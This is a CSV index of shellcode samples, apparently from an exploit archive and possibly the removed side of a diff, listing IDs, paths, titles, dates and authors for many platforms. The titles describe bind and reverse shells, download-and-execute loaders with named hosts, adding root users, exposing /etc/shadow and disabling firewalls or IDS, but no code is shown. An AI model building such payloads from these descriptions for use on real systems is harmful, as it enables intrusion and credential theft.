-13356,shellcodes/lin_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode, -13357,shellcodes/lin_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode, -13358,shellcodes/lin_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode, -13359,shellcodes/lin_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode, -13360,shellcodes/lin_x86/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode, -13361,shellcodes/lin_x86/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode, -13362,shellcodes/lin_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode, -13363,shellcodes/lin_x86/13363.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode, -13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",generator,shellcode, -13365,shellcodes/lin_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,lin_x86,shellcode, -13366,shellcodes/lin_x86/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode, -13367,shellcodes/lin_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode, -13368,shellcodes/lin_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode, -13369,shellcodes/lin_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode, -13370,shellcodes/lin_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode, -13371,shellcodes/lin_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode, -13372,shellcodes/lin_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode, -13373,shellcodes/lin_x86/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode, -13374,shellcodes/lin_x86/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode, -13375,shellcodes/lin_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode, -13376,shellcodes/lin_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode, -13377,shellcodes/lin_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode, -13378,shellcodes/lin_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode, -13379,shellcodes/lin_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode, -13380,shellcodes/lin_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode, -13381,shellcodes/lin_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode, -13382,shellcodes/lin_x86/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode, -13383,shellcodes/lin_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode, -13384,shellcodes/lin_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,lin_x86,shellcode, -13385,shellcodes/lin_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode, -13386,shellcodes/lin_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode, -13387,shellcodes/lin_x86/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode, -13388,shellcodes/lin_x86/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode, -13389,shellcodes/lin_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode, -13390,shellcodes/lin_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode, -13391,shellcodes/lin_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode, -13392,shellcodes/lin_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode, -13393,shellcodes/lin_x86/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode, -13394,shellcodes/lin_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode, -13395,shellcodes/lin_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode, -13396,shellcodes/lin_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode, -13397,shellcodes/lin_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode, -13398,shellcodes/lin_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode, -13399,shellcodes/lin_x86/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode, -13400,shellcodes/lin_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode, -13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,generator,shellcode, -13402,shellcodes/lin_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode, -13403,shellcodes/lin_x86/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode, -13404,shellcodes/lin_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode, -13405,shellcodes/lin_x86/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode, -13406,shellcodes/lin_x86/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode, -13407,shellcodes/lin_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode, -13408,shellcodes/lin_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode, -13409,shellcodes/lin_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode, -13410,shellcodes/lin_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,lin_x86,shellcode, -13411,shellcodes/lin_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,lin_x86,shellcode, -13412,shellcodes/lin_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode, -13413,shellcodes/lin_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode, -13414,shellcodes/lin_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode, -13415,shellcodes/lin_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,lin_x86,shellcode, -13416,shellcodes/lin_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,lin_x86,shellcode, -13417,shellcodes/lin_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode, -13418,shellcodes/lin_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode, -13419,shellcodes/lin_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode, -13420,shellcodes/lin_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode, -13421,shellcodes/lin_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode, -13422,shellcodes/lin_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode, -13423,shellcodes/lin_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode, -13424,shellcodes/lin_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode, -13425,shellcodes/lin_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode, -13426,shellcodes/lin_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode, -13427,shellcodes/lin_x86/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode, -13428,shellcodes/lin_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode, -13429,shellcodes/lin_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode, -13430,shellcodes/lin_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode, -13431,shellcodes/lin_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode, -13432,shellcodes/lin_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode, -13433,shellcodes/lin_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode, -13434,shellcodes/lin_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode, -13435,shellcodes/lin_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode, -13436,shellcodes/lin_x86/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode, -13437,shellcodes/lin_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode, -13438,shellcodes/lin_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode, -13439,shellcodes/lin_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode, -13440,shellcodes/lin_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode, -13441,shellcodes/lin_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode, -13442,shellcodes/lin_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode, -13443,shellcodes/lin_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13444,shellcodes/lin_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13445,shellcodes/lin_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13446,shellcodes/lin_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13447,shellcodes/lin_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode, -13448,shellcodes/lin_x86/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13449,shellcodes/lin_x86/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13450,shellcodes/lin_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13451,shellcodes/lin_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode, -13452,shellcodes/lin_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode, -13453,shellcodes/lin_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode, -13454,shellcodes/lin_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode, -13455,shellcodes/lin_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode, -13456,shellcodes/lin_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode, -13457,shellcodes/lin_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode, -13458,shellcodes/lin_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode, -13460,shellcodes/lin_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode, -13461,shellcodes/lin_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode, -13462,shellcodes/lin_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode, -13463,shellcodes/lin_x86-64/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode, -13464,shellcodes/lin_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode, -13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode, -13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode, -13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode, -13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode, -13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode, -13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode, -13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode, -13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode, -13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode, -13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode, -13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes)",2006-05-01,hophet,openbsd_x86,shellcode, -13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode, -13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,openbsd_x86,shellcode, -13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode, -13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode, -13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode, -13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode, -13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode, -13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode, -13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,generator,shellcode, -13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode, -13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode, -13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode, -13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode, -13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode, -13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode, -13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",generator,shellcode, -13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode, -13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode, -13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode, -13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode, -13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode, -13504,shellcodes/win_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode, -13505,shellcodes/win_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode, -13507,shellcodes/win_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,win_x86,shellcode, -13508,shellcodes/win_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode, -13509,shellcodes/win_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode, -13510,shellcodes/win_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode, -13511,shellcodes/win_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode, -13512,shellcodes/win_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode, -13513,shellcodes/win_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode, -13514,shellcodes/win_x86/13514.asm,"Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,win_x86,shellcode, -13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",generator,shellcode, -13516,shellcodes/win_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode, -13517,shellcodes/win_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode, -13518,shellcodes/win_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode, -13519,shellcodes/win_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,win_x86,shellcode, -13520,shellcodes/win_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode, -13521,shellcodes/win_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode, -13522,shellcodes/win_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode, -13523,shellcodes/win_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode, -13524,shellcodes/win_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode, -13525,shellcodes/win_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode, -13526,shellcodes/win_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode, -13527,shellcodes/win_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode, -13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)",2004-10-25,lion,generator,shellcode, -13529,shellcodes/win_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode, -13530,shellcodes/win_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode, -13531,shellcodes/win_x86/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode, 